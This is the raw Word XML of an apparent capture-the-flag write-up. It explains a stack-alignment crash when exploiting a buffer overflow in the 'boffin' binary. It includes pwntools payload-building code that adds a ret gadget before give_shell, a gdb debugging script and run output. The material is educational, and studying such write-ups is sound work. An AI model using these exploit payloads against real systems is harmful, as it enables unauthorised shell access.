    <w:p w14:paraId="56EAA4D0" w14:textId="03833256" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Debugging for a Safer Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CDDC93" w14:textId="57D9BB13" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">The crash during the exploitation of a local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>boffin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> instance occurs at a line in </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>sys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DBE" w14:paraId="425638FF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40095D89" w14:textId="2DF36E68" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00DF5A55">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00581DBE">
              <w:t xml:space="preserve">=&gt; 0x7ffff7e17603 &lt;do_system+339&gt;:    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00581DBE">
              <w:t>movaps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00581DBE">
              <w:t xml:space="preserve"> %xmm0,0x50(%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00581DBE">
              <w:t>rsp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00581DBE">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E197AED" w14:textId="68EDEE7F" w:rsidR="00581DBE" w:rsidRDefault="00C6225E" w:rsidP="00581DBE">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crash </w:t>
      </w:r>
      <w:r w:rsidR="00581DBE">
        <w:t>Line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28018081" w14:textId="700CE48F" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">This error is caused because hijacking </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rip</w:t>
      </w:r>
      <w:r>
        <w:t>, as demonstrated above, causes</w:t>
      </w:r>
      <w:r w:rsidR="00581DBE">
        <w:t xml:space="preserve"> the stack pointer,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="BoxCodeChar"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00581DBE" w:rsidRPr="00581DBE">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to be misaligned. Many modern machines use </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>128-bit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> registers to copy data larger than </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>64-bits</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Therefore, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> must be aligned to </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>16 bytes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, not </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The server running the remote challenge is older and does not use that register, preventing errors due to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> alignment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CABA70F" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">Even on most modern machines, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>16-byte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aligned by default. It stays aligned during normal operations because of the two operations performed at the beginning of each function: the </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> operation pushes the return address to the stack, then the base pointer is pushed to the stack. These two pushes move the stack down </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>16 bytes</w:t>
      </w:r>
      <w:r>
        <w:t>, keeping it aligned with each new call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4034CE41" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">However, overwriting </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> forces the program to jump to the first line of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>give_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as if it were the next line in the assembly code. In that case, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is not performed, meaning the return address is not pushed to the stack. Then, when </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>give_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> starts, it pushes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rbp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to the stack as usual, moving </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rbp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> down a total of </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>8 bytes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instead of the expected </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>, eventually causing a crash when an instruction requires stack alignment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D96B5B" w14:textId="2FC5284F" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">To avoid this error, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>boffin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> needs to </w:t>
      </w:r>
      <w:r w:rsidR="00581DBE">
        <w:t>perform</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> before jumping to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>give_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F8506F" w14:textId="069D6CC1" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">The following script uses a new payload that contains the address of a return call </w:t>
      </w:r>
      <w:r w:rsidR="00581DBE">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00581DBE" w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="00581DBE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">before the address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>give_shell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499" w14:paraId="056F7F57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23BCEC8E" w14:textId="77777777" w:rsidR="00EB5499" w:rsidRDefault="00EB5499" w:rsidP="00EB5499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buildSafePld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21CBBDD8" w14:textId="77777777" w:rsidR="00EB5499" w:rsidRDefault="00EB5499" w:rsidP="00EB5499">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">base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41) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in range(0,40)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7918546B" w14:textId="77777777" w:rsidR="007431EA" w:rsidRDefault="00EB5499" w:rsidP="00EB5499">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>retAddr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">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1a), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>("B", 0x07),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="203ED6C8" w14:textId="16A8F6A1" w:rsidR="00EB5499" w:rsidRDefault="007431EA" w:rsidP="00EB5499">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00EB5499">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00EB5499">
              <w:t xml:space="preserve">("B", 0x40), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00EB5499">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00EB5499">
              <w:t xml:space="preserve">("B", 0x00), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00EB5499">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00EB5499">
              <w:t>("B", 0x00)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D9A28C7" w14:textId="77777777" w:rsidR="007431EA" w:rsidRDefault="00EB5499" w:rsidP="00EB5499">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">data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9d), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>("B", 0x06),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25C2878B" w14:textId="5E1B3182" w:rsidR="00EB5499" w:rsidRDefault="007431EA" w:rsidP="00EB5499">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00EB5499">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00EB5499">
              <w:t xml:space="preserve">("B", 0x40), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00EB5499">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00EB5499">
              <w:t xml:space="preserve">("B", 0x00), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00EB5499">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00EB5499">
              <w:t>("B", 0x00)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32D6A944" w14:textId="77777777" w:rsidR="00EB5499" w:rsidRDefault="00EB5499" w:rsidP="00EB5499">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">pad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00) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in range(0,3)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="702855A7" w14:textId="77777777" w:rsidR="00EB5499" w:rsidRDefault="00EB5499" w:rsidP="00EB5499">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">return base + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>retAddr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> + pad + </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>data</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="566AD5D9" w14:textId="77777777" w:rsidR="00EB5499" w:rsidRDefault="00EB5499" w:rsidP="00EB5499">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B9AD6E6" w14:textId="77777777" w:rsidR="00EB5499" w:rsidRDefault="00EB5499" w:rsidP="00EB5499">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>getSafeShell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E331310" w14:textId="77777777" w:rsidR="00EB5499" w:rsidRDefault="00EB5499" w:rsidP="00EB5499">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">payload = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EB5499">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>buildSafePl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86F4106" w14:textId="77777777" w:rsidR="00EB5499" w:rsidRDefault="00EB5499" w:rsidP="00EB5499">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pP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"Hey! What's your name?")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F1E78D2" w14:textId="77777777" w:rsidR="00EB5499" w:rsidRDefault="00EB5499" w:rsidP="00EB5499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payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67E98A67" w14:textId="1F0DCA83" w:rsidR="00EB5499" w:rsidRDefault="00EB5499" w:rsidP="00EB5499">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>p.interactive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07288588" w14:textId="6F5120CB" w:rsidR="00EB5499" w:rsidRDefault="00EB5499" w:rsidP="00EB5499">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Building the New Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56323930" w14:textId="5FC46CAE" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">This should overwrite </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB5499">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with the address of the return instruction instead of the address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB5499">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>give_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. This will cause the program to move to that instruction and perform a </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB5499">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> operation, popping an address off the top of the stack and </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB5499">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>calling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it. At this time, the top of the stack contains the payload data </w:t>
      </w:r>
      <w:r w:rsidR="00EB5499">
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the address stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB5499">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which should be the address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB5499">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>give_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DC688C" w14:textId="088B3B4B" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">To demonstrate, breakpoints were set before and at the </w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instruction in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> met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27BB" w14:paraId="4598F43C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07B4DC1" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB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pwnGDB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2562C5C6" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># Start gdb session</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5949FC8B" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">p </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>=  process</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>('/bin/bash')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="066A4282" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB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gdb ./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boffin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -q')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="358618D2" w14:textId="1C1C174C" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Important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break *0x0000000000400719")</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:rStyle w:val="BoxCodeChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>//break at leave</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7472EE7A" w14:textId="39D3268B" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Important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break *0x000000000040071a")</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:rStyle w:val="BoxCodeChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>//break at ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7833B561" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB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r")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72C23C34" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>#</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>p.recv</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E718F72" w14:textId="208C7B5F" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>getSafeShell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(p)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53EAE756" w14:textId="34490489" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwnGdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17EA0B40" w14:textId="35599601" w:rsidR="00EB5499" w:rsidRDefault="00581FB9" w:rsidP="00555F5B">
      <w:r w:rsidRPr="00581FB9">
        <w:t xml:space="preserve">At line </w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x0000000000400719</w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:t xml:space="preserve"> method </w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>leave</w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:t xml:space="preserve"> instruction, both addresses are further down in the st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499" w14:paraId="356E9C63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78ECCC9F" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9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2F72E09B" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 Boffin_Pwn.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="651F6310" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[*] Switching to interactive </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>mode</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="002844F8" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23EA7DA4" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Hi, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x1a\x07@</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75E2C21C" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Breakpoint 1, 0x0000000000400719 in main ()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="173DA9FB" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>(gdb) $ info registers rip</w:t>
            </w:r>
          </w:p>
